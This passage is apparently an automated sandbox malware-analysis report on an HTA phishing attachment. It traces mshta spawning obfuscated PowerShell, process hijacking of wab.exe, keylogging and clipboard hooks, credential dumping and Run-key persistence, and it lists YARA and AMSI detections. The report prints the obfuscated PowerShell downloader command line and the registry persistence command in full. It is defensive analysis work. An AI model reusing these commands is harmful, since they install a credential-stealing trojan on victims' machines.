              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              Source: amsi32_3748.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_2212.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 6098
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6098
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0419DC2F Sleep,LdrInitializeThunk,NtProtectVirtualMemory
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004016FD NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: amsi32_3748.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2212.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winHTA@46/25@7/8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Idealogical143.cho
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2212
              Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2661558073.0000000004651000.00000004.00000020.00020000.00000000.sdmp, chp6361.tmp.16.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta ReversingLabs: Detection: 54%
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33248
              Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
              Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll, wldp.dll, mshtml.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, cryptbase.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, propsys.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wininet.dll, d2d1.dll, dwrite.dll, d3d11.dll, d3d10warp.dll, dxcore.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, scrrun.dll, sxs.dll, mpr.dll, msasn1.dll, gpapi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, dataexchange.dll, dcomp.dll, twinapi.appcore.dll, msls31.dll, jscript9.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, wkscli.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
